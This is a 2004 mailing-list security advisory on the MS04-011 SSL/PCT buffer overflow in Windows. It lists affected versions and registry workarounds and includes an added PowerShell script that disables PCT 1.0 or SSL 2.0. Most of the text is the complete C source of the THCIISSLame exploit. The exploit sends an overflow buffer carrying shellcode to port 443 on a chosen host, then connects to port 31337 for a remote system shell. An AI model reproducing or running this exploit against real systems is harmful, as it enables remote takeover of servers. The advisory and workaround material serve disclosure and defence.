[NT] Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 04/22/04
To: list@securiteam.com
Date: 22 Apr 2004 12:44:31 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)
------------------------------------------------------------------------
SUMMARY
ISS X-Force has discovered a remotely exploitable buffer overflow
condition in the Microsoft Secure Sockets Layer (SSL) library. SSL is an
encryption technology commonly used to secure Web and email
communications. A buffer overflow condition occurs when processing PCT 1.0
handshake packets that can lead to remote, privileged compromise of
affected Windows installations.
DETAILS
Affected Versions:
* Microsoft Windows 2000 up to and including SP4
* Microsoft Windows NT version 4 up to and including SP6a
* Microsoft Windows XP up to SP1
Note: The SSL library included in Windows Server 2003 contains the
vulnerability. However, the PCT 1.0 protocol is disabled by default.
Impact:
If any SSL-enabled services are present, and both the PCT 1.0 and SSL 2.0
protocols are enabled, remote attackers may exploit the buffer overflow
condition to execute arbitrary code on vulnerable Windows server
installations. This code would run with local system privileges. The
protocols necessary for remote exploitation are enabled by default in
Windows 2000 and Windows NT version 4.
Common vectors for exploitation might include Internet Information Server
(IIS), Exchange Server, Active Directory, and potentially any software
making use of the Microsoft SSL library including unlisted third-party
software.
The severity of this vulnerability is compounded by the fact that SSL is
most often used to secure communications involving confidential or
valuable financial information, and that firewalls and packet filtering
alone will not be able to stop attacks, since the malicious handshake
arrives on the same port as legitimate SSL traffic. X-Force believes that
hackers will aggressively target this vulnerability given the high-value
nature of Web sites protected by SSL.
Solution:
The PCT 1.0 protocol is a legacy protocol that is not required for secure
SSL communication. The PCT 1.0 protocol can be safely disabled as a
workaround for the vulnerability described in this advisory. However,
systems using Microsoft Message Queue (MSMQ) cannot disable PCT 1.0
without impacting MSMQ. In this circumstance, SSL 2.0 can be safely
disabled instead to close the vulnerability. Successful exploitation of the
vulnerability requires that both PCT 1.0 and SSL 2.0 are enabled; the
vulnerability is removed if either PCT 1.0 or SSL 2.0 is disabled.
Customers are encouraged to immediately evaluate the two scenarios
described above and select the workaround that best applies to their
environment.
Microsoft has published a Knowledge Base article (187498) that describes
how to disable certain SSL protocols, including PCT 1.0, SSL 2.0 and SSL
3.0. Microsoft Knowledge Base article 187498 is available at the following
address:
http://support.microsoft.com/support/kb/articles/q187/4/98.asp
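As an added example that is not part of the ISS advisory or the THC code, the following PowerShell script audits the two protocol switches on a Windows host and can apply either of the workarounds described above; it assumes the SCHANNEL\Protocols\<name>\Server key and its DWORD "Enabled" value are laid out as KB 187498 describes, and it needs a host with PowerShell (Windows 2000 and NT 4 would take the equivalent .reg edit instead).

```powershell
# Added example (not from the advisory or the THC code): audit and optionally
# apply the MS04-011 workaround. Key layout (Protocols\<name>\Server, DWORD
# "Enabled") is assumed to follow Microsoft KB 187498; verify before use.
param(
    [ValidateSet('Audit', 'DisablePCT', 'DisableSSL2')]
    [string]$Mode = 'Audit'
)

$base = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols'

function Get-ServerProtocolState {
    param([string]$Name)
    $key = Join-Path $base "$Name\Server"
    if (-not (Test-Path $key)) {
        # No override: the OS default applies. The advisory says PCT 1.0 and
        # SSL 2.0 are enabled by default on Windows 2000 and Windows NT 4.
        return 'default'
    }
    $enabled = (Get-ItemProperty -Path $key).Enabled
    if ($null -eq $enabled) { return 'default' }
    if ($enabled -eq 0) { return 'disabled' }
    return 'enabled'
}

function Disable-ServerProtocol {
    param([string]$Name)
    $key = Join-Path $base "$Name\Server"
    New-Item -Path $key -Force | Out-Null
    # Enabled = 0 switches off the server side of the protocol for Schannel.
    New-ItemProperty -Path $key -Name 'Enabled' -Value 0 -PropertyType DWord -Force | Out-Null
}

switch ($Mode) {
    'DisablePCT'  { Disable-ServerProtocol 'PCT 1.0' }  # preferred workaround
    'DisableSSL2' { Disable-ServerProtocol 'SSL 2.0' }  # when MSMQ still needs PCT 1.0
}

$pct  = Get-ServerProtocolState 'PCT 1.0'
$ssl2 = Get-ServerProtocolState 'SSL 2.0'
"PCT 1.0 server: $pct"
"SSL 2.0 server: $ssl2"

# Exploitation requires both protocols; disabling either one closes the hole.
if ($pct -eq 'disabled' -or $ssl2 -eq 'disabled') {
    'Result: workaround in place.'
} else {
    'Result: neither protocol is explicitly disabled; run with -Mode DisablePCT'
    '        (or -Mode DisableSSL2 on hosts where MSMQ requires PCT 1.0).'
}
```

Run it from an elevated prompt; Schannel reads these values at startup, so reboot after changing them and re-run in Audit mode to confirm.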
Additional Information:
Microsoft Security Bulletin MS04-011:
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
Exploit:
/*****************************************************************************/
/* THCIISSLame 0.1 - IIS 5 SSL remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* Bug was found by Internet Security Systems */
/* Reversing credits of the bug go to Halvar Flake */
/* */
/* compile with MS Visual C++ : cl THCIISSLame.c */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, FtR and Random */
/*****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define jumper "\xeb\x0f"
#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"
char sslshit[] =
"\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
char shellcode[] =
"\xeb\x23\x7a\x69\x02\x05\x6c\x59\xf8\x1d\x9c\xde\x8c\xd1\x4c"
"\x70\xd4\x03\xf0\x27\x20\x20\x30\x08\x57\x53\x32\x5f\x33\x32"
"\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed"
"\x2a\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b"
"\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b"
"\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20"
"\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31"
"\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x05\x8d\x44\x45\x04"
"\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50\x52\x2b"
"\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f\xb6\x4d"
"\x05\x89\x44\x8d\xd8\xfe\x4d\x05\x75\xbe\xfe\x4d\x04\x74\x21"
"\xfe\x4d\x22\x8d\x5d\x18\x53\xff\xd0\x89\xc7\x6a\x04\x58\x88"
"\x45\x05\x80\x45\x77\x0a\x8d\x5d\x74\x80\x6b\x26\x14\xe9\x78"
"\xff\xff\xff\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff"
"\xd0\x97\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff\x55\xd4\x4e"
"\x56\x57\xff\x55\xcc\x53\x55\x57\xff\x55\xd0\x97\x8d\x45\x88"
"\x50\xff\x55\xe4\x55\x55\xff\x55\xe8\x8d\x44\x05\x0c\x94\x53"
"\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45"
"\xcc\x94\x57\x57\x57\x53\x53\xfe\xc6\x01\xf2\x52\x94\x8d\x45"
"\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52"
"\x53\x53\x53\x55\xff\x55\xec\x6a\xff\xff\x55\xe0";
void usage();
void shell(int sock);
int main(int argc, char *argv[])
{
unsigned int i,sock,sock2,addr,rc;
unsigned char *badbuf,*p;
unsigned long offset = 0x6741a1cd;
unsigned long XOR = 0xffffffff;
struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;
printf("\nTHCIISSLame v0.1 - IIS 5.0 SSL remote root exploit\n");
printf("tested on Windows 2000 Server german/english SP4\n");
printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
if(argc<2 || argc>2)
usage();
badbuf = malloc(347);
memset(badbuf,0,347);
printf("\n[*] building buffer\n");
p = badbuf;
memcpy(p,sslshit,sizeof(sslshit));
p+=sizeof(sslshit)-1;
strcat(p,jumper);
strcat(p,greetings_to_microsoft);
offset^=XOR;
strncat(p,(unsigned char *)&offset,4);
strcat(p,shellcode);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;
if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;
mytcp.sin_port=htons(443);
printf("[*] connecting the target\n");
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,badbuf,346,0);
printf("[*] Exploit send successfully ! Sleeping a while ....\n");
Sleep(1000);
}
else
printf("\nCan't connect to ssl port 443!\n");
if(rc==0)
{
printf("[*] Trying to get a shell\n\n");
sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
mytcp.sin_port = htons(31337);
rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
if(rc!=0)
{
printf("can't connect to port 31337 ;( maybe firewalled ...\n");
exit(-1);
}
shell(sock2);
}
shutdown(sock,1);
closesocket(sock);
free(badbuf);
exit(0);
}
void usage()
{
unsigned int a;
printf("\nUsage: <Host>\n");
printf("Sample: THCIISSLame 31.33.7.23\n\n");
exit(0);
}
void shell(int sock)
{
int l;
char buf[1024];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("bye bye...\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("bye bye...\n");
return;
}
}
}
}
ADDITIONAL INFORMATION
The information has been provided by Mark Dowd and Neel Mehta of the ISS
X-Force.
The exploit has been provided by Johnny Cyberpunk of THC (johncybpk@gmx.net).